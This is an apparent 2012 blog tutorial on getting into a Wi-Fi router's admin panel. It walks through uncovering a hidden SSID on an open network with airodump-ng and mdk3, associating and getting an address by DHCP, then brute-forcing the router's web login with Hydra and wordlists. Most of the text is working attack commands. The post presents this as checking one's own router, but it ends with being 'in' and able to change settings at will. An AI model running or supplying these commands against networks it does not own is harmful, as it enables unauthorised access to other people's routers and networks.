Wednesday, September 12, 2012

Using Hydra after connecting to network


Tutorial provided by
Keeper


After gaining access to your network, you can check the strength of your router's access passwords by using a tool called Hydra from THC.
Hydra is a login / password bruteforce cracker which uses password/dictionary files.

First we find our network and do what is needed to log in
In this case my test setup is:

* Eee PC 900, using the built in Atheros wireless.
* Open network with hidden SSID on channel 3, no clients attached, no mac filtering enabled.

Code:airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0 -f 1500 -t OPN -a

(using the -f function to slow down the channel hopping and -t option to filter out open networks)



After finding the network and relevant info with airodump, I'll use my custom ssid wordlist to crack the hidden ssid:

Code:
mdk3 ath0 p -c 2 -t 00:13:D4:09:32:60 -f /mnt/sda1/ssid.txt -s 50

Depending on how often the AP sends beacons it can take a while to start, it will also show other networks broadcasting.


So now we have all the info we need to connect to this open network.
We start by stopping the wireless interface which is now still in monitor mode and
recreate in managed mode and then enter in the information we have acquired to access network and check for success:

Code:
airmon-ng stop ath0
wlanconfig ath0 create wlandev wifi0 wlanmode sta
iwconfig ath0 channel 2 essid TEST ap 00:13:D4:09:32:60
ifconfig ath0 up
iwconfig ath0


Success ! (see link quality? we have a connection!)

Now to see whether the AP has DHCP enabled so we can automatically get an IP address using dhcpcd with the -t option to give a time limit and the -d to give some extra info on our MAC and IP address when given.
When successful we can do a netstat to see what IP address the router is using (gateway):

Code:
dhcpcd -t 30 -d ath0
netstat -nr


So now we know that the router can be found on IP address 192.168.200.1, lets try to log in using some standard password combinations..


No luck..


OK, so now we will attempt to use Hydra.
Note the address line in the browser; http://192.168.200.1/index.asp
I have wordlists stored on my sda1 drive which have been prepared using a combination of default passwords and regularly used ones.

Code:
hydra 192.168.200.1 -L /mnt/sda1/login.txt -P /mnt/sda1/password.txt -t 2 -e ns -f http-get /index.asp

This can take a while, and so to speed things up I tweaked my custom wordlist a bit.


Success !

So now using the above found working login and password, we try to login again:


We're in !


So now we are in the router and can make changes as we see fit !
And make sure that the security is increased..

0 comments:

Post a Comment